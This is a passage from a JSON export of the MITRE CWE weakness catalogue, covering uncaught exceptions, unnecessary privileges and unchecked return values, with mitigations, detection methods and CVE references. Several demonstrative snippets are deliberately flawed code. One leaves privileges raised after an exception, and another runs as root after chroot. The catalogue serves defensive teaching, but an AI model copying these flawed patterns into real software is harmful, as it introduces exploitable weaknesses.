Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name, References"}],"Previous_Entry_Name":[{"#text":"Often Misused: Authentication","attr":{"@_Date":"2008-04-11"}},{"#text":"Reliance on DNS Lookups in a Security Decision","attr":{"@_Date":"2013-07-17"}},{"#text":"DEPRECATED (Duplicate): Reliance on DNS Lookups in a Security Decision","attr":{"@_Date":"2021-07-20"}}]}},"248":{"attr":{"@_ID":"248","@_Name":"Uncaught Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An exception is thrown from a function, but it is not caught.","Extended_Description":"When an exception is not caught, it may cause the program to crash or expose sensitive information.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Confidentiality"],"Impact":["DoS: Crash, Exit, or Restart","Read Application Data"],"Note":"An uncaught exception could cause the system to be placed in a state that could lead to a crash, exposure of sensitive information or other unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-39"},"Intro_Text":"The following example attempts to resolve a hostname.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {}","xhtml:div":{"#text":"String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println(\\"hello \\" + addr.getHostName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"A DNS lookup failure will cause the Servlet to throw an exception."},{"Intro_Text":"The _alloca() function allocates memory on the stack. If an allocation request is too large for the available stack space, _alloca() throws an exception. If the exception is not caught, the program will crash, potentially enabling a denial of service attack. _alloca() has been deprecated as of Microsoft Visual Studio 2005(R). It has been replaced with the more secure _alloca_s()."},{"Intro_Text":"EnterCriticalSection() can raise an exception, potentially causing the program to crash. Under operating systems prior to Windows 2000, the EnterCriticalSection() function can raise an exception in low memory situations. If the exception is not caught, the program will crash, potentially enabling a denial of service attack."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: Exception Handling"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR06-J","Entry_Name":"Do not throw undeclared checked exceptions"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"Removed C from Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Often Misused: Exception Handling","attr":{"@_Date":"2008-01-30"}}}},"249":{"attr":{"@_ID":"249","@_Name":"DEPRECATED: Often Misused: Path Manipulation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because of name\\n\\tconfusion and an accidental combination of multiple\\n\\tweaknesses. Most of its content has been transferred to\\n\\tCWE-785.\\n\\n This entry was deprecated for several reasons. The primary\\n reason is over-loading of the \\"path manipulation\\" term and the\\n description. The original description for this entry was the\\n same as that for the \\"Often Misused: File System\\" item in the\\n original Seven Pernicious Kingdoms paper. However, Seven\\n Pernicious Kingdoms also has a \\"Path Manipulation\\" phrase that\\n is for external control of pathnames (CWE-73), which is a\\n factor in symbolic link following and path traversal, neither\\n of which is explicitly mentioned in 7PK. Fortify uses the\\n phrase \\"Often Misused: Path Manipulation\\" for a broader range\\n of problems, generally for issues related to buffer\\n management. Given the multiple conflicting uses of this term,\\n there is a chance that CWE users may have incorrectly mapped\\n to this entry.\\n\\n\\tThe second reason for deprecation is an implied combination of\\n\\tmultiple weaknesses within buffer-handling functions. The\\n\\tfocus of this entry was generally on the path-conversion\\n\\tfunctions and their association with buffer\\n\\toverflows. However, some of Fortify\'s Vulncat entries have the\\n\\tterm \\"path manipulation\\" but describe a non-overflow weakness\\n\\tin which the buffer is not guaranteed to contain the entire\\n\\tpathname, i.e., there is information truncation (see CWE-222\\n\\tfor a similar concept). A new entry for this non-overflow\\n\\tweakness may be created in a future version of CWE.","Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Importance":"Critical","Modification_Comment":"Described inconsistencies in this entry, which the CWE Content Team had already slated for deprecation."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Demonstrative_Examples, Description, Maintenance_Notes, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Often Misused: Path Manipulation","attr":{"@_Date":"2009-07-27"}}}},"250":{"attr":{"@_ID":"250","@_Name":"Execution with Unnecessary Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.","Extended_Description":{"xhtml:p":["New weaknesses can be exposed because running with extra privileges, such as root or Administrator, can disable the normal security checks being performed by the operating system or surrounding environment. Other pre-existing weaknesses can turn into security vulnerabilities if they occur while operating at raised privileges.","Privilege management functions can behave in some less-than-obvious ways, and they have different quirks on different platforms. These inconsistencies are particularly pronounced if you are transitioning from one non-root user to another. Signal handlers and spawned processes run at the privilege of the owning process, so if a process is running as root when a signal fires or a sub-process is executed, the signal handler or sub-process will operate with root privileges."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":{"xhtml:p":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},{"Phase":"Installation"},{"Phase":"Architecture and Design","Note":{"xhtml:p":"If an application has this design problem, then it can be easier for the developer to make implementation-related errors such as CWE-271 (Privilege Dropping / Lowering Errors). In addition, the consequences of Privilege Chaining (CWE-268) can become more severe."}},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Read Application Data","DoS: Crash, Exit, or Restart"],"Note":"An attacker will be able to gain access to any resources that are allowed by the extra privileges. Common results include executing code, disabling services, and reading restricted data."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-11.7"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and perform a login. Look for library functions and system calls that indicate when privileges are being raised or dropped. Look for accesses of resources that are restricted to normal users."]},"Effectiveness_Notes":"Note that this technique is only useful for privilege issues related to system resources. It is not likely to detect application-level business rules that are related to privileges, such as if a blog system allows a user to delete a blog entry without first checking that the user has administrator privileges."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Compare binary / bytecode to application permission manifest"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host Application Interface Scanner"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Configuration Checker","Permission Manifest Analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-18"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators."},{"attr":{"@_Mitigation_ID":"MIT-18"},"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators."},{"Phase":"Implementation","Description":"Perform extensive input validation for any privileged code that must be exposed to the user and reject anything that does not fit your strict requirements."},{"attr":{"@_Mitigation_ID":"MIT-19"},"Phase":"Implementation","Description":"When dropping privileges, ensure that they have been dropped successfully to avoid CWE-273. As protection mechanisms in the environment get stronger, privilege-dropping calls may fail even if it seems like they would always succeed."},{"Phase":"Implementation","Description":"If circumstances force you to run with extra privileges, then determine the minimum access level necessary. First identify the different permissions that the software and its users will need to perform their actions, such as file read and write permissions, network socket permissions, and so forth. Then explicitly allow those actions while denying all else [REF-76]. Perform extensive input validation and canonicalization to minimize the chances of introducing a separate vulnerability. This mitigation is much more prone to error than dropping the privileges in the first place."},{"attr":{"@_Mitigation_ID":"MIT-37"},"Phase":["Operation","System Configuration"],"Strategy":"Environment Hardening","Description":"Ensure that the software runs properly under the Federal Desktop Core Configuration (FDCC) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-126"},"Intro_Text":"This code temporarily raises the program\'s privileges to allow creation of a new user folder.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def makeNewUserDir(username):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if invalidUsername(username):try:except OSError:return True","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"print(\'Usernames cannot contain invalid characters\')return False","xhtml:br":["","",""],"xhtml:i":"#avoid CWE-22 and CWE-78"}},{"#text":"raisePrivileges()os.mkdir(\'/home/\' + username)lowerPrivileges()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"print(\'Unable to create new user directory for user:\' + username)return False","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","",""]}}}},"Body_Text":"While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur."},{"Intro_Text":"The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(APP_HOME);chdir(\\"/\\");FILE* data = fopen(argv[1], \\"r+\\");...","xhtml:br":["","",""]}},"Body_Text":"Constraining the process inside the application\'s home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced."},{"Intro_Text":"This application intends to use a user\'s location to determine the timezone the user is in:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();setTimeZone(userCurrLocation);","xhtml:br":["","","",""]}},"Body_Text":"This is unnecessary use of the location API, as this information is already available using the Android Time API. Always be sure there is not another way to obtain needed information before resorting to using the location API."},{"attr":{"@_Demonstrative_Example_ID":"DX-111"},"Intro_Text":"This code uses location to determine the user\'s current US State location.","Body_Text":["First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application\'s manifest.xml:","During execution, a call to getLastLocation() will return a location based on the application\'s location permissions. In this case the application has permission for the most accurate location possible:","While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":"<uses-permission android:name=\\"android.permission.ACCESS_FINE_LOCATION\\"/>"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation);","xhtml:br":["","","",""]}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-4217","Description":"FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4217"},{"Reference":"CVE-2008-1877","Description":"Program runs with privileges and calls another program with the same privileges, which allows read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1877"},{"Reference":"CVE-2007-5159","Description":"OS incorrectly installs a program with setuid privileges, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5159"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2008-0162","Description":"Program does not drop privileges before calling another program, allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0162"},{"Reference":"CVE-2008-0368","Description":"setuid root program allows creation of arbitrary files through command line argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0368"},{"Reference":"CVE-2007-3931","Description":"Installation script installs some programs as setuid when they shouldn\'t be.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3931"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: Privilege Management"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER09-J","Entry_Name":"Minimize privileges before deserializing from a privilege context"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"470"}},{"attr":{"@_CAPEC_ID":"69"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 7, "Running with Least Privilege" Page 207"}},{"attr":{"@_External_Reference_ID":"REF-199"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 16: Executing Code With Too Much Privilege." Page 243"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Privilege Vulnerabilities", Page 477"}}]},"Notes":{"Note":[{"#text":"There is a close association with CWE-653 (Insufficient Separation of Privileges). CWE-653 is about providing separate components for each privilege; CWE-250 is about ensuring that each component has the least amount of privileges possible.","attr":{"@_Type":"Relationship"}},{"#text":"CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. Both CWE-272 and CWE-250 are in active use by the community. The \\"least privilege\\" phrase has multiple interpretations.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Modes_of_Introduction, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Observed_Examples, References, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Often Misused: Privilege Management","attr":{"@_Date":"2008-01-30"}},{"#text":"Design Principle Violation: Failure to Use Least Privilege","attr":{"@_Date":"2009-01-12"}}]}},"252":{"attr":{"@_ID":"252","@_Name":"Unchecked Return Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions.","Extended_Description":"Two common programmer assumptions are \\"this function call can never fail\\" and \\"it doesn\'t matter if this function call fails\\". If an attacker can force the function to fail or otherwise return a value that is not expected, then the subsequent program logic could lead to a vulnerability, because the software is not in 